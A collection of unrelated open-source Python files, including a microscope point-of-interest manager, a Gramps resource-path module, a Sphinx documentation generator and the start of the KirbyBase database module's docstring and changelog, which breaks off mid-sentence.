new_coords = newpos - sample_pos
this_poi.set_coords_in_sample(new_coords)
self.signal_poi_updated.emit()
return return_val
self.log.error('JJ. The given POI ({0}) does not exist.'.format(poikey))
return -1
def rename_poi(self, poikey=None, name=None, emit_change=True):
""" Sets the name of the given poi.
@param string poikey: the key of the poi
@param string name: name of the poi to be set
@return int: error code (0:OK, -1:error)
"""
if poikey is not None and name is not None and poikey in self.poi_list.keys():
success = self.poi_list[poikey].set_name(name=name)
# if this is the active POI then we need to update poi tag in savelogic
if self.poi_list[poikey] == self.active_poi:
self.update_poi_tag_in_savelogic()
if emit_change:
self.signal_poi_updated.emit()
return success
else:
self.log.error('AAAThe given POI ({0}) does not exist.'.format(
poikey))
return -1
def start_periodic_refocus(self, poikey=None):
""" Starts the perodic refocussing of the poi.
@param float duration: (optional) the time between periodic optimization
@param string poikey: (optional) the key of the poi to be set and refocussed on.
@return int: error code (0:OK, -1:error)
"""
if poikey is not None and poikey in self.poi_list.keys():
self._current_poi_key = poikey
else:
# Todo: warning message that active POI used by default
self._current_poi_key = self.active_poi.get_key()
self.log.info('Periodic refocus on {0}.'.format(self._current_poi_key))
self.timer_step = 0
self.timer = QtCore.QTimer()
self.timer.setSingleShot(False)
self.timer.timeout.connect(self._periodic_refocus_loop)
self.timer.start(300)
self.signal_periodic_opt_started.emit()
return 0
def set_periodic_optimize_duration(self, duration=None):
""" Change the duration of the periodic optimize timer during active
periodic refocussing.
@param float duration: (optional) the time between periodic optimization.
"""
if duration is not None:
self.timer_duration = duration
else:
self.log.warning('No timer duration given, using {0} s.'.format(
self.timer_duration))
self.signal_periodic_opt_duration_changed.emit()
def _periodic_refocus_loop(self):
""" This is the looped function that does the actual periodic refocus.
If the time has run out, it refocussed the current poi.
Otherwise it just updates the time that is left.
"""
self.time_left = self.timer_step - time.time() + self.timer_duration
self.signal_timer_updated.emit()
if self.time_left <= 0:
self.timer_step = time.time()
self.optimise_poi(poikey=self._current_poi_key)
def stop_periodic_refocus(self):
""" Stops the perodic refocussing of the poi.
@return int: error code (0:OK, -1:error)
"""
if self.timer is None:
self.log.warning('No timer to stop.')
return -1
self.timer.stop()
self.timer = None
self.signal_periodic_opt_stopped.emit()
return 0
def _refocus_done(self, caller_tag, optimal_pos):
""" Gets called automatically after the refocus is done and saves the new position
to the poi history.
Also it tracks the sample and may go back to the crosshair.
@return int: error code (0:OK, -1:error)
"""
# We only need x, y, z
optimized_position = optimal_pos[0:3]
# If the refocus was on the crosshair, then only update crosshair POI and don't
# do anything with sample position.
caller_tags = ['confocalgui', 'magnet_logic', 'singleshot_logic']
if caller_tag in caller_tags:
self.poi_list['crosshair'].add_position_to_history(position=optimized_position)
# If the refocus was initiated here by poimanager, then update POI and sample
elif caller_tag == 'poimanager':
if self._current_poi_key is not None and self._current_poi_key in self.poi_list.keys():
self.set_new_position(poikey=self._current_poi_key, newpos=optimized_position)
if self.go_to_crosshair_after_refocus:
temp_key = self._current_poi_key
self.go_to_poi(poikey='crosshair')
self._current_poi_key = temp_key
else:
self.go_to_poi(poikey=self._current_poi_key)
return 0
else:
self.log.error('W. The given POI ({0}) does not exist.'.format(
self._current_poi_key))
return -1
else:
self.log.error('Unknown caller_tag for the optimizer. POI '
'Manager does not know what to do with optimized '
'position, and has done nothing.'
)
def reset_roi(self):
del self.poi_list
self.poi_list = dict()
self.roi_name = ''
# initally add crosshair to the pois
crosshair = PoI(pos=[0, 0, 0], name='crosshair')
crosshair._key = 'crosshair'
self.poi_list[crosshair._key] = crosshair
# Re-initialise sample in the poi list
sample = PoI(pos=[0, 0, 0], name='sample')
sample._key = 'sample'
self.poi_list[sample._key] = sample
self.signal_poi_updated.emit()
def set_active_poi(self, poikey=None):
"""
Set the active POI object.
"""
if poikey is None:
# If poikey is none and no active poi is set, then do nothing
if self.active_poi is None:
return
else:
self.active_poi = None
elif poikey in self.get_all_pois():
# If poikey is the current active POI then do nothing
if self.poi_list[poikey] == self.active_poi:
return
else:
self.active_poi = self.poi_list[poikey]
else:
# todo: error poikey unknown
return -1
self.update_poi_tag_in_savelogic()
self.signal_poi_updated.emit() # todo: this breaks the emit_change = false case
def _deactivate_poi(self):
self.set_active_poi(poikey=None)
def update_poi_tag_in_savelogic(self):
if self.active_poi is not None:
self._save_logic.active_poi_name = self.active_poi.get_name()
else:
self._save_logic.active_poi_name = ''
def save_poi_map_as_roi(self):
'''Save a list of POIs with their coordinates to a file.
'''
# File path and name
filepath = self._save_logic.get_path_for_module(module_name='ROIs')
# We will fill the data OderedDict to send to savelogic
data = OrderedDict()
# Lists for each column of the output file
poinames = []
poikeys = []
x_coords = []
y_coords = []
z_coords = []
for poikey in self.get_all_pois(abc_sort=True):
if poikey is not 'sample' and poikey is not 'crosshair':
thispoi = self.poi_list[poikey]
poinames.append(thispoi.get_name())
poikeys.append(poikey)
x_coords.append(thispoi.get_coords_in_sample()[0])
y_coords.append(thispoi.get_coords_in_sample()[1])
z_coords.append(thispoi.get_coords_in_sample()[2])
data['POI Name'] = np.array(poinames)
data['POI Key'] = np.array(poikeys)
data['X'] = np.array(x_coords)
data['Y'] = np.array(y_coords)
data['Z'] = np.array(z_coords)
self._save_logic.save_data(data, filepath=filepath, filelabel=self.roi_name,
fmt=['%s', '%s', '%.6e', '%.6e', '%.6e'])
self.log.debug('ROI saved to:\n{0}'.format(filepath))
return 0
def load_roi_from_file(self, filename=None):
if filename is None:
return -1
roifile = open(filename, 'r')
for line in roifile:
if line[0] != '#' and line.split()[0] != 'NaN':
saved_poi_name = line.split()[0]
saved_poi_key = line.split()[1]
saved_poi_coords = [
float(line.split()[2]), float(line.split()[3]), float(line.split()[4])]
this_poi_key = self.add_poi(position=saved_poi_coords, key=saved_poi_key, emit_change=False)
self.rename_poi(poikey=this_poi_key, name=saved_poi_name, emit_change=False)
roifile.close()
# Now that all the POIs are created, emit the signal for other things (ie gui) to update
self.signal_poi_updated.emit()
return 0
def triangulate(self, r, a1, b1, c1, a2, b2, c2):
""" Reorients a coordinate r that is known relative to reference points a1, b1, c1 to
produce a new vector rnew that has exactly the same relation to rotated/shifted/tilted
reference positions a2, b2, c2.
@param np.array r: position to be remapped.
@param np.array a1: initial location of ref1.
@param np.array a2: final location of ref1.
@param np.array b1, b2, c1, c2: similar for ref2 and ref3
"""
ab_old = b1 - a1
ac_old = c1 - a1
ab_new = b2 - a2
ac_new = c2 - a2
# Firstly, find the angle to rotate ab_old onto ab_new. This rotation must be done in
# the plane that contains these two vectors, which means rotating about an axis
# perpendicular to both of them (the cross product).
axis1 = np.cross(ab_old, ab_new) # Only works if ab_old and ab_new are not parallel
axis1length = np.sqrt((axis1 * axis1).sum())
if axis1length == 0:
ab_olddif = ab_old + np.array([100, 0, 0])
axis1 = np.cross(ab_old, ab_olddif)
# normalising the axis1 vector
axis1 = axis1 / np.sqrt((axis1 * axis1).sum())
# The dot product gives the angle between ab_old and ab_new
dot = np.dot(ab_old, ab_new)
x_modulus = np.sqrt((ab_old * ab_old).sum())
y_modulus = np.sqrt((ab_new * ab_new).sum())
# float errors can cause the division to be slightly above 1 for 90 degree rotations, which
# will confuse arccos.
cos_angle = min(dot / x_modulus / y_modulus, 1)
angle1 = np.arccos(cos_angle) # angle in radians
# Construct a rotational matrix for axis1
n1 = axis1[0]
n2 = axis1[1]
n3 = axis1[2]
m1 = np.matrix(((((n1 * n1) * (1 - np.cos(angle1)) + np.cos(angle1)),
((n1 * n2) * (1 - np.cos(angle1)) - n3 * np.sin(angle1)),
((n1 * n3) * (1 - np.cos(angle1)) + n2 * np.sin(angle1))
),
(((n2 * n1) * (1 - np.cos(angle1)) + n3 * np.sin(angle1)),
((n2 * n2) * (1 - np.cos(angle1)) + np.cos(angle1)),
((n2 * n3) * (1 - np.cos(angle1)) - n1 * np.sin(angle1))
),
(((n3 * n1) * (1 - np.cos(angle1)) - n2 * np.sin(angle1)),
((n3 * n2) * (1 - np.cos(angle1)) + n1 * np.sin(angle1)),
((n3 * n3) * (1 - np.cos(angle1)) + np.cos(angle1))
)
)
)
# Now that ab_old can be rotated to overlap with ab_new, we need to rotate in another
# axis to fix "tilt". By choosing ab_new as the rotation axis we ensure that the
# ab vectors stay where they need to be.
# ac_old_rot is the rotated ac_old (around axis1). We need to find the angle to rotate
# ac_old_rot around ab_new to get ac_new.
ac_old_rot = np.array(np.dot(m1, ac_old))[0]
axis2 = -ab_new # TODO: check maths to find why this negative sign is necessary. Empirically it is now working.
axis2 = axis2 / np.sqrt((axis2 * axis2).sum())
# To get the angle of rotation it is most convenient to work in the plane for which axis2 is the normal.
# We must project vectors ac_old_rot and ac_new into this plane.
a = ac_old_rot - np.dot(ac_old_rot, axis2) * axis2 # projection of ac_old_rot in the plane of rotation about axis2
b = ac_new - np.dot(ac_new, axis2) * axis2 # projection of ac_new in the plane of rotation about axis2
# The dot product gives the angle of rotation around axis2
dot = np.dot(a, b)
x_modulus = np.sqrt((a * a).sum())
y_modulus = np.sqrt((b * b).sum())
cos_angle = min(dot / x_modulus / y_modulus, 1) # float errors can cause the division to be slightly above 1 for 90 degree rotations, which will confuse arccos.
angle2 = np.arccos(cos_angle) # angle in radians
# Construct a rotation matrix around axis2
n1 = axis2[0]
n2 = axis2[1]
n3 = axis2[2]
m2 = np.matrix(((((n1 * n1) * (1 - np.cos(angle2)) + np.cos(angle2)),
((n1 * n2) * (1 - np.cos(angle2)) - n3 * np.sin(angle2)),
((n1 * n3) * (1 - np.cos(angle2)) + n2 * np.sin(angle2))
),
(((n2 * n1) * (1 - np.cos(angle2)) + n3 * np.sin(angle2)),
((n2 * n2) * (1 - np.cos(angle2)) + np.cos(angle2)),
((n2 * n3) * (1 - np.cos(angle2)) - n1 * np.sin(angle2))
),
(((n3 * n1) * (1 - np.cos(angle2)) - n2 * np.sin(angle2)),
((n3 * n2) * (1 - np.cos(angle2)) + n1 * np.sin(angle2)),
((n3 * n3) * (1 - np.cos(angle2)) + np.cos(angle2))
)
)
)
# To find the new position of r, displace by (a2 - a1) and do the rotations
a1r = r - a1
rnew = a2 + np.array(np.dot(m2, np.array(np.dot(m1, a1r))[0]))[0]
return rnew
def reorient_roi(self, ref1_coords, ref2_coords, ref3_coords, ref1_newpos, ref2_newpos, ref3_newpos):
""" Move and rotate the ROI to a new position specified by the newpos of 3 reference POIs from the saved ROI.
@param ref1_coords: coordinates (from ROI save file) of reference 1.
@param ref2_coords: similar, ref2.
@param ref3_coords: similar, ref3.
@param ref1_newpos: the new (current) position of POI reference 1.
@param ref2_newpos: similar, ref2.
@param ref3_newpos: similar, ref3.
"""
for poikey in self.get_all_pois(abc_sort=True):
if poikey is not 'sample' and poikey is not 'crosshair':
thispoi = self.poi_list[poikey]
old_coords = thispoi.get_coords_in_sample()
new_coords = self.triangulate(old_coords, ref1_coords, ref2_coords, ref3_coords, ref1_newpos, ref2_newpos, ref3_newpos)
self.move_coords(poikey=poikey, newpos=new_coords)
def autofind_pois(self, neighborhood_size=1, min_threshold=10000, max_threshold=1e6):
"""Automatically search the xy scan image for POIs.
@param neighborhood_size: size in microns. Only the brightest POI per neighborhood will be found.
@param min_threshold: POIs must have c/s above this threshold.
@param max_threshold: POIs must have c/s below this threshold.
"""
# Calculate the neighborhood size in pixels from the image range and resolution
x_range_microns = np.max(self.roi_map_data[:, :, 0]) - np.min(self.roi_map_data[:, :, 0])
y_range_microns = np.max(self.roi_map_data[:, :, 1]) - np.min(self.roi_map_data[:, :, 1])
y_pixels = len(self.roi_map_data)
x_pixels = len(self.roi_map_data[1, :])
pixels_per_micron = np.max([x_pixels, y_pixels]) / np.max([x_range_microns, y_range_microns])
# The neighborhood in pixels is nbhd_size * pixels_per_um, but it must be 1 or greater
neighborhood_pix = int(np.max([math.ceil(pixels_per_micron * neighborhood_size), 1]))
data = self.roi_map_data[:, :, 3]
data_max = filters.maximum_filter(data, neighborhood_pix)
maxima = (data == data_max)
data_min = filters.minimum_filter(data, 3 * neighborhood_pix)
diff = ((data_max - data_min) > min_threshold)
maxima[diff is False] = 0
labeled, num_objects = ndimage.label(maxima)
xy = np.array(ndimage.center_of_mass(data, labeled, range(1, num_objects + 1)))
for count, pix_pos in enumerate(xy):
poi_pos = self.roi_map_data[pix_pos[0], pix_pos[1], :][0:3]
this_poi_key = self.add_poi(position=poi_pos, emit_change=False)
self.rename_poi(poikey=this_poi_key, name='spot' + str(count), emit_change=False)
# Now that all the POIs are created, emit the signal for other things (ie gui) to update
self.signal_poi_updated.emit()
| childresslab/MicrocavityExp1 | logic/poi_manager_logic.py | Python | gpl-3.0 | 35,041 |
# coding: utf-8
"""
MIT License
Copyright (c) 2019 Claude SIMON (https://q37.info/s/rmnmqd49)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import sys
sys.path.append("workshop/_")
import educ as _
from accessor import *
# from constants import *
from items import *
from helpers import *
_.setEnums(globals(),"label",(
"Restart",
"SecretWord",
"Letter",
"Expected",
"Obtained",
"True",
"False"
))
| epeios-q37/epeios | other/exercises/Hangman/workshop/_/_.py | Python | agpl-3.0 | 1,462 |
import boto.swf.layer2 as swf
from garcon import activity
from garcon import runner
import logging
import random
logger = logging.getLogger(__name__)
domain = 'dev'
name = 'workflow_sample'
create = activity.create(domain, name)
def activity_failure(context, activity):
num = int(random.random() * 4)
if num != 3:
logger.warn('activity_3: fails')
raise Exception('fails')
print('activity_3: end')
test_activity_1 = create(
name='o',
run=runner.Sync(
lambda context, activity: logger.debug('activity_1')))
test_activity_2 = create(
name='activity_2',
requires=[test_activity_1],
run=runner.Async(
lambda context, activity: logger.debug('activity_2_task_1'),
lambda context, activity: logger.debug('activity_2_task_2')))
test_activity_3 = create(
name='activity_3',
retry=10,
requires=[test_activity_1],
run=runner.Sync(activity_failure))
test_activity_4 = create(
name='activity_4',
requires=[test_activity_3, test_activity_2],
run=runner.Sync(
lambda context, activity: logger.debug('activity_4')))
| pkuong/garcon | example/test_flow.py | Python | mit | 1,119 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('package', '0004_package_parsed_pkgbuild'),
]
operations = [
migrations.AddField(
model_name='package',
name='extra_deps',
field=models.TextField(default=''),
),
]
| maikelwever/autoaurbuilder | autoaurbuilder/package/migrations/0005_package_extra_deps.py | Python | gpl-3.0 | 407 |
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2013 John Ralls <jralls@ceridwen.us>
# Copyright (C) 2020 Nick Hall <nick-h@gramps-project.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
import sys
import os
import logging
LOG = logging.getLogger("ResourcePath")
_hdlr = logging.StreamHandler()
_hdlr.setFormatter(logging.Formatter(fmt="%(name)s.%(levelname)s: %(message)s"))
LOG.addHandler(_hdlr)
from ..constfunc import get_env_var
class ResourcePath:
"""
ResourcePath is a singleton, meaning that only one of them is ever
created. At startup it finds the paths to Gramps's resource files and
caches them for future use.
It should be called only by const.py; other code should retrieve the
paths from there.
Attempt to derive the resource path from the package path assuming that
one of the three main installation schemes has been used.
The package path will be one of the following:
<prefix>/lib/pythonX.Y/site-packages
<prefix>\Lib\site-packages
<home>/lib/python
<userbase>/lib/pythonX.Y/site-packages
<userbase>\PythonXY\site-packages
Where <prefix>, <home> and <userbase> are the resource paths used in the
Prefix, Home and User installation schemes.
The use of the command line option "--install-data" in the setup script
is no longer supported.
"""
instance = None
def __new__(cls):
if not cls.instance:
cls.instance = super(ResourcePath, cls).__new__(cls)
cls.instance.initialized = False
return cls.instance
def __init__(self):
if self.initialized:
return
package_path = os.path.abspath(os.path.join(os.path.dirname(
__file__), '..', "..", ".."))
installed = not os.path.exists(os.path.join(package_path, '.git'))
if installed:
test_path = os.path.join("gramps", "authors.xml")
else:
test_path = os.path.join("data", "authors.xml")
resource_path = None
tmp_path = get_env_var('GRAMPS_RESOURCES')
if (tmp_path and os.path.exists(os.path.join(tmp_path, test_path))):
resource_path = tmp_path
elif installed:
base_path = None
head, tail = os.path.split(package_path)
if tail in ('site-packages', 'dist-packages'):
# Prefix or User installation scheme
head, tail = os.path.split(head)
if tail.startswith('python'):
base_path, tail = os.path.split(head)
elif tail == 'Lib' or tail.startswith('Python'):
base_path = head
elif tail == 'python':
# Home installation scheme
base_path, tail = os.path.split(head)
if base_path is not None:
resource_path = os.path.join(base_path, 'share')
else:
LOG.error("Unable to determine resource path")
sys.exit(1)
else:
# Let's try to run from source without env['GRAMPS_RESOURCES']:
resource_path = package_path
if (not os.path.exists(os.path.join(resource_path, test_path))):
LOG.error("Resource Path %s is invalid", resource_path)
sys.exit(1)
resource_path = os.path.abspath(resource_path)
if installed:
self.locale_dir = os.path.join(resource_path, 'locale')
self.data_dir = os.path.join(resource_path, 'gramps')
self.image_dir = os.path.join(resource_path, 'gramps', 'images')
self.doc_dir = os.path.join(resource_path, 'doc', 'gramps')
else:
self.locale_dir = os.path.join(resource_path, 'build', 'mo')
self.image_dir = os.path.join(resource_path, 'images')
self.data_dir = os.path.join(resource_path, 'data')
self.doc_dir = os.path.join(resource_path, 'build', 'data')
self.initialized = True
| SNoiraud/gramps | gramps/gen/utils/resourcepath.py | Python | gpl-2.0 | 4,665 |
#! /usr/bin/python
import sys, re, os
def generateFile(input_directory, file_name, output_directory,
package_heirarchy=None, module_name=None):
"""Generate a rst file telling sphinx to just generate documentation
for the public interface automatically. Output will be written to
*file_name*.rst in the current directory.
:param input_directory: a string specifying the directory containing the
source code file
:param file_name: the name of the python source code file to generate
a sphinx rst file describing
:param ouput_directory: a string specifying the directory where
the generated rst file should be placed. If *output_directory* does
not already exist, it will be created
:param package_heirarchy: a list of strings, where each name is
the name of a package, in the order of the hierarchy
:param module_name: the name of the module. If not given, the .py is
removed from *file_name* to produce the module_name
"""
#Stick all output into a list of strings, then just join it and output
#it all in on go.
output = []
# Create the output directory if it doesn't already exist. Note that
# if the directory is created between the check and the creation, it
# might cause issues, but I don't think this likely at all to happen
if not os.path.exists(output_directory):
try:
os.makedirs(output_directory)
except OSError as e:
print "Error creating the output directory"
print e.args
try:
#Open the file
f = open(os.path.join(input_directory, file_name), 'r')
#Do the module output
if not module_name:
module_name = re.search('(\w+).py$', file_name).group(1)
#Append the package names, if there are any
full_module_name = module_name
if package_heirarchy:
full_module_name = '.'.join(package_heirarchy) + '.' + module_name
output.append(full_module_name)
output.append('=' * len(full_module_name))
output.append('.. automodule:: %s\n' % full_module_name)
#Read the file, and do output for classes
class_reg = re.compile('^class (\w+)')
func_reg = re.compile('^def ((?:[a-zA-Z0-9]+_)*[a-zA-Z0-9]+)')
#We don't need a blank line between autofunction directives, but we do
#need one between autofunctions and headings etc. for classes. This
#keeps track if we're switching from autofunctions to classes, so we
#can add that blank line.
finding_functions = False
for line in iter(f):
#Search for classes
match = class_reg.match(line)
if match is not None:
if finding_functions:
output.append('')
finding_functions = False
class_name = match.group(1)
output.append(class_name)
output.append('-' * len(class_name))
output.append('''.. autoclass:: %s
:members:
:show-inheritance:
''' % class_name)
#Search for top level functions
else:
match = func_reg.match(line)
if match is not None:
func_name = match.group(1)
output.append('.. autofunction:: ' + func_name)
finding_functions = True
f.close()
except IOError as e:
print "Error opening the input file : ", os.path.join(input_directory, file_name)
print e.args[1]
else:
#Write the output
try:
output_file_name = os.path.join(output_directory, module_name) + '.rst'
f = open(output_file_name, 'w')
f.write('\n'.join(output))
except IOError as e:
print "Error opening the output file : ", output_file_name
print e.args[1]
def generateIndex(module_list, output_directory):
"""Create an index.rst file for sphinx in the given directory.
:param module_list: a list of the names of the modules to list in
the index file
:param output_directory: the directory to create the index file in
"""
#Sort the module_list
module_list.sort()
try:
#open the file
f = open(os.path.join(output_directory, 'index.rst'), 'w')
#Do the output
f.write(""".. Yum documentation master file, created by
sphinx-quickstart on Mon Jun 27 14:01:20 2011.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to Yum's documentation!
===============================
Contents:
.. toctree::
:maxdepth: 2
""")
f.write('\n '.join(module_list))
f.write("""
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
""")
except IOError as e:
print "Error opening the output file."
print e.args[1]
def generateAll(source_directory, output_directory):
#Verify that both the source and output directories exist
# Keep a set of file names that are packages. This is
# useful so that later we will be able to figure out full
# module names.
packages = set()
# Keep a list of tuples containing python module names and
# relative paths, so that we can build the index file later
modules = []
# Walk the directory tree
for dirpath, dirnames, filenames in os.walk(source_directory, topdown=True):
# print dirpath
# print dirnames
# print filenames
# print
# Add the curent directory to packages if __init__.py exists
if '__init__.py' in filenames:
packages.add(dirpath)
# Find the hierarchy of packages that we are currently in
package_heirarchy = []
#Recurse up to the root
dirpath_i = dirpath
while dirpath_i != '/':
if dirpath_i in packages:
dirpath_i, tail = os.path.split(dirpath_i)
package_heirarchy.insert(0, tail)
else:
break
# Find the relative output directory, mirroring the input
# directory structure
relative_output_directory = ''
if not os.path.samefile(dirpath, source_directory):
relative_output_directory = os.path.relpath(dirpath, source_directory)
# Don't recurse into directories that are hidden, or for docs
for directory in dirnames:
if directory == "docs" or directory.startswith("."):
dirnames.remove(directory)
# Generate the rst for a file if it is a python source code file
for file_name in filenames:
# Skip file names that contain dashes, since they're not
# valid module names, so we won't be able to import them
# to generate the documentation anyway
if '-' in file_name:
continue
if file_name.endswith('.py'):
module_name = file_name.partition('.')[0]
modules.append(os.path.join(relative_output_directory,
module_name))
generateFile(dirpath, file_name,
os.path.join(output_directory, relative_output_directory),
package_heirarchy, module_name)
# Create the index.rst file
generateIndex(modules, output_directory)
if __name__ == "__main__":
generateAll(os.getcwd(), os.getcwd())
| pnasrat/yum | docs/sphinxdocs/rstgenerator.py | Python | gpl-2.0 | 7,752 |
import sys
from fsgamesys.plugins.pluginmanager import PluginManager
"""
DOSBox-FS launcher script used for testing.
"""
def app_main():
executable = PluginManager.instance().find_executable("dosbox-fs")
process = executable.popen(sys.argv[1:])
process.wait()
| FrodeSolheim/fs-uae-launcher | launcher/apps/dosbox_fs.py | Python | gpl-2.0 | 276 |
# Be careful, this version is tweaked by Malte to avoid raising string exceptions...
"""Contains classes for a plain-text, client-server dbms.
Classes:
KirbyBase - database class
KBError - exceptions
Example:
from db import *
db = KirbyBase()
db.create('plane.tbl', ['name:str', 'country:str', 'speed:int',
'range:int'])
db.insert('plane.tbl', ['P-51', 'USA', 403, 1201])
db.insert('plane.tbl', ['P-38', 'USA', 377, 999])
db.select('plane.tbl', ['country', 'speed'], ['USA', '>400'])
db.update('plane.tbl', ['country'], ['USA'], ['United States'],
['country'])
db.delete('plane.tbl', ['speed'], ['<400'])
db.close()
Author:
Jamey Cribbs -- jcribbs@twmi.rr.com
www.netpromi.com
History:
2003-04-08: Version 1.0 released.
2003-04-15: Version 1.01 released.
-Added getFieldNames method.
-Added getFieldTypes method.
-Added drop method.
-Added check for existing file in create method.
-Improved documentation.
2003-07-16: Version 1.02 released.
-KirbyBase now uses distutils for installation.
-Fixed bug in createTable where field list was getting modified.
-Fixed bug in insert where values list was getting modified.
-Added the ability to use special characters in table data such
as \r, \n, \032, and |.
-Changed the name of all private methods to start with two
underscores, thereby following recommended naming conventions.
-Improved documentation.
-Added licensing information.
2003-08-14: Version 1.3 released.
-Added len method.
-Fixed bug in validateMatchCriteria where script was not
restricting other match criteria if already attempting to match
by recno.
-Fixed bug in validateMatchCriteria where script was not checking
to see if pattern argument was an integer when attempting to
match by recno.
-Added ability to pass field values to update and insert using a
dictionary.
-Added ability to specify field to sort on and sort direction for
the results of a select.
-Changed the way field types are handled internally. Instead of
treating them as strings (which is how they are stored) and
having to constantly 'eval' them to get the type, I decided to
work with them in their 'native' format. This should not change
any of the api or interfaces, EXCEPT for the getFieldTypes
method, which now returns a list of types, instead of a list of
strings. I hope this doesn't screw anyone's programs up.
-Corrected version number to conform to guidelines in distutils
documentation.
2003-08-27: Version 1.4 released.
-Added two new database field types: datetime.date and
datetime.datetime. They are stored as strings, but are input and
output as instances of datetime.date and datetime.datetime
respectively.
-Made a few internal optimizations when running queries that have
resulted in a 15-20% speed increase when doing large queries or
updates.
-Changed the name of all private methods from starting with two
underscores to starting with one underscore based on a discussion
in comp.lang.python as to how to properly name private variables.
2003-09-02: Version 1.5 released.
-Changed the way queries are handled internally. Instead of doing
an eval to do numeric and datetime comparisons, I changed it to do
the actual comparison itself. This resulted in a 40% speed
increase on large queries that do comparison expressions.
-Changed how data is passed between the server and the client in
client/server mode. I now use cPickle instead of repr and eval.
This resulted in an approximately 40% speed increase in
client/server operations.
2004-06-10: Version 1.5.1 released.
-Added a new database field type: boolean.
-Fixed a bug where KirbyBase was trying to convert an empty table
field (i.e. '') back into it's native format such as int or float
and raising an Exception. Now, if a table field is empty, I just
append it to the result record as is and dont' try to convert it.
-getMatches method will now split each database record only up to
the number of fields required to satisfy the query. This should
save a little query time on large databases with many fields.
-Added ability to have the getMatches method match string fields
based on string equality rather than regular expressions.
2004-06-22: Version 1.6 released.
-On numeric comparisons, you can now specify negative numbers.
-Fixed a bug where program would crash if you had a space between
the comparison operator and the number in numeric comparisons in
select statement.
-You can select all records by specifying that you want to match
'recno' against '*'.
-Got rid of the last eval in the code.
-Modest speed improvement by checking for strings that need to be
encoded first insteading of just encoding all strings.
-Added a compatibility layer for declaring field types when
creating a table. If you use the new compatible field types when
creating a table, you can use the table either from the Python or
Ruby version of KirbyBase without having to change anything.
-Changed the record-counter and deleted-records-counter in the
header record of the table to be zero padded instead of spaces
padded.
2005-01-30: Version 1.7 released.
-***IMPORTANT***
Changed the default value for the keyword argument 'useRegExp' to
be false instead of true. This means that, when doing a update,
delete, or select, records being selected on string fields will
be matched using exact matching instead of regular expression
matching. If you want to do regular expression matching, pass
'useRegExp = True' to the method.
-Added a new public method called validate. Calling this method
with a table name will check each record of that table and
validate that all of the fields have values of the correct type.
This can be used to validate data you have put into the table by
means other than through KirbyBase, perhaps by opening the table
in a text editor and typing in information.
-Fixed a bug in _closeTable where if an exception occurred it was
blowing up because the variable 'name' did not exist.
-Fixed a bug in _writeRecord where if an exception occured it was
blowing up because the variable 'name' did not exist.
-Fixed a bug in _getMatches where I was referencing
self.field_names as a method instead of as a dictionary.
-Added a keyword argument to select() called returnType. If set to
'object', the result list returned will contain Record objects
where each field name is an attribute of the object, so you could
refer to a record's field as plane.speed instead of plane[4]. If
set to 'dict', the result list returned will contain dictionaries
where each key is a field name and each value is a field value.
If set to 'list', the default, the result is a list of lists.
-Added a new method, insertBatch. It allows you to insert multiple
records at one time into a table.
-Added a new private method, _strToBool, that converts string
values like 'True' to boolean values.
-Added a new private method, _convertInput, and moved to it the
code that ensures that the data on an insert is in proper list
format. I did this so that I did not have duplicate code in both
the insert and insertBatch methods.
-To accomodate the fact that users can now send a large batch of
records to be inserted, I changed _sendSocket so that it first
sends the length of the database command to the server, then it
actually sends the command itself, which can now be any length.
-Changed the code in _getMatches to precompile the regular
expression pattern instead of dynamically compiling every time the
pattern is compared to a table record. This should speed up
queries a little bit.
-Changed the code in select that converts table fields back to
their native types to be more efficient.
-Changed _sendSocket to use StringIO (actually cStringIO) to hold
the result set of a client/server-based query instead of just
capturing the result by concatenating records to one big string.
In informal testing on large result sets, it shaves a few tenths
of a second off the query time.
2005-01-31: Version 1.7.1 released.
-Fixed a nasty bug in _getMatches. If useRegExp was True and the
select was against multiple string fields, the code was only
using one of the input patterns to search on instead of using all
of them.
2005-02-20: Version 1.8 released.
******** IMPORTANT - Method Interface Changes ****************
-Added the ability to sort the result set of a select by multiple
fields and to specify whether each field should be sorted
ascending or descending. This necessitated a change to the
interface of the select method. I moved the position of sortField
in the argument list and also changed it to be a list instead of a
string. I also changed the name of sortField to sortFields. I
also moved sortDesc in the arguement list and also made it a list.
******************************************************************
-Added another allowable value, 'report', to the keyword
parameter, returnType in the select method. This returns the
result set in a pretty print format. Along with this, added
another keyword parameter called rptSettings to the select method.
This is only used if rptType is 'report'. It is a 2 element list.
The first element specifies the number of records to print on a
page. The second element is boolean specifying whether to print
a dashed line between records.
-Added ability to pass field values to update and insert using an
object with attributes set equal to the field names.
-Fixed a bug in _getMatches. If a field of type int or float had
a blank value in the table (i.e. ''), the code was attempting to
convert it to it's proper type (i.e. int or float) before
doing the match comparison. This would cause an exception to
occur. Now, if the field is an int,float,date or datetime and it
is blank, I convert it to None. This allows the numeric
comparisons to work correctly for null fields.
-Fixed a bug in select. If a field in the result set was equal
